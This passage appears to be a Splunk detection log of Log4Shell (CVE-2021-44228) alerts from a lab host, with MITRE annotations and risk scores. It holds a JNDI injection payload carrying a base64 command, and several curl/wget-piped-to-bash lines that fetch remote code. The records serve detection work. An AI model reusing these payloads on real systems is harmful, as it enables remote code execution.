but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644554, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 12", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="DE.AE", annotations._all="Stage:Initial Access", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644552, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 16", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="Stage:Execution", annotations._all="Exploitation", annotations._all="T1190", annotations._all="CIS 3", annotations._all="Source:Application Log", annotations._all="CVE-2021-44228", annotations._all="CIS 5", annotations._all="DE.CM", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644516, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense 